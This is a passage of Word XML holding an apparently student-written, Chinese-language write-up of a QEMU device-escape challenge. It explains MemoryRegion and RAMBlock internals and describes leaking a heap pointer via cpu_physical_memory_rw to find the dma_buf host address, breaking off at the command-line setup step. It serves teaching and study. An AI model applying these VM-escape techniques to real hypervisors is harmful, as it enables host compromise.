          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AdressSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>结构体的成员定义可以参考wiki。每个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AddressSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">里面关联了一个root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MemoryRegion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MemoryRegion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是表示Guest物理内存（GPA）的结构体。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MemoryResion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会组成一个树形结构，逐渐瓜分整个地址空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403FA101" w14:textId="1D16C893" w:rsidR="00CA1641" w:rsidRDefault="00452BB1" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MemoryRegion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有根 (root)、实例 (instance)、别名 (alias) 三种类型。其中，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根类型</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的MR</w:t>
      </w:r>
      <w:r w:rsidRPr="00452BB1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用以表示与管理由多个 sub-M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00452BB1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 组成的内存区域，并不实际指向一块内存区域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="00AF5F63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实体类型的和alias用来表示实际内存。MR结构体中存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF5F63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MemoryRegionOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF5F63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型的字段ops，保</w:t>
      </w:r>
      <w:r w:rsidR="00AF5F63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>存了MR的成员函数。MR的读写函数在ops中。子MR以链表的形式保存在subregions字段中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01268A11" w14:textId="229EECFD" w:rsidR="00AF5F63" w:rsidRDefault="00AF5F63" w:rsidP="00AF5F63">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的视角来看，保存MR对应的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息的结构体是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RAMBlock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。在MR结构体中，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ram_block</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段指向了一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RAMBlock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。其中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF5F63">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段是一个MR 的指针，host字段 记录了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对应的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E2A51E" w14:textId="5390165A" w:rsidR="00CA1641" w:rsidRDefault="00AF5F63" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64841B41" wp14:editId="4AC82457">
            <wp:extent cx="5274310" cy="2456815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="123901547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2456815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="423AA46D" w14:textId="3883007B" w:rsidR="00F27977" w:rsidRDefault="00F27977" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看了全局变量</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address_space_memory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值。经过多级查找，找到了设备的起始地址，如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B664C03" w14:textId="73889940" w:rsidR="00F27977" w:rsidRDefault="00F27977" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F27977">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="436F0EDE" wp14:editId="4BED62F0">
            <wp:extent cx="5274310" cy="3886200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="85076645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3886200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB082D" w14:textId="000DE07D" w:rsidR="00F27977" w:rsidRDefault="00F27977" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">很显然，如此复杂的层级关系在本题无法使用。特别是 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address_space_memory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;root是一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的指针。想解引用等价于需要知道</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的映射关系，循环了。此路不通，在本次实验我们没再继续这个方向了，后续可以看看有没有负责处理地址转换的函数，看看能不能调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280699AA" w14:textId="73A67711" w:rsidR="00F27977" w:rsidRPr="008E0FF8" w:rsidRDefault="00F27977" w:rsidP="00F27977">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>找到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的对应关系 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 成功尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A57F04" w14:textId="362909FC" w:rsidR="00F27977" w:rsidRDefault="00F27977" w:rsidP="00F27977">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">之后我们问了问 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>zzh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，切换思路为泄露堆的地址。在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中执行x打印出指针p后面的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆空间</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>变量，如下图，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是p的地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE6582" w14:textId="6D443EE3" w:rsidR="00F27977" w:rsidRPr="00F27977" w:rsidRDefault="00F27977" w:rsidP="00F27977">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E2D7157" wp14:editId="6061FF94">
            <wp:extent cx="4016088" cy="823031"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2926720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672060" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4016088" cy="823031"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD2ED42" w14:textId="77777777" w:rsidR="00F27977" w:rsidRDefault="00F27977" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此时</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆分配</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的地址范围是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B18FAD" w14:textId="52F6AA76" w:rsidR="00F27977" w:rsidRDefault="00F27977" w:rsidP="00F27977">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27FDEC93" wp14:editId="79ABE82B">
            <wp:extent cx="4306957" cy="234298"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10838662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866209" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4336428" cy="235901"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="687248F9" w14:textId="53891EEE" w:rsidR="00CA1641" w:rsidRDefault="00F27977" w:rsidP="00F27977">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看到 ，&amp;p+0x30处是一个指向</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆空间</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的指针。我们记录下来该指针当前值和当前的堆起始地址，然后在exp中使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>泄露出&amp;p+0x30的动态地址，进而可以</w:t>
      </w:r>
      <w:r w:rsidR="00047E59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>减去偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>计算出</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的实际地址。</w:t>
      </w:r>
      <w:r w:rsidR="00047E59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如下图exp所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C44932" w14:textId="48138502" w:rsidR="00047E59" w:rsidRDefault="00047E59" w:rsidP="00047E59">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FE27CF6" wp14:editId="0CED8319">
            <wp:extent cx="5274310" cy="2526665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="5234494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449450" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2526665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F28434D" w14:textId="57801788" w:rsidR="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">至此，我们找到了 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31575F8D" w14:textId="77777777" w:rsidR="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54914860" w14:textId="59CBC655" w:rsidR="00731A98" w:rsidRPr="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>布置</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="168B37BF" w14:textId="0B48D634" w:rsidR="00731A98" w:rsidRDefault="00731A98" w:rsidP="00731A98">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们可以通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
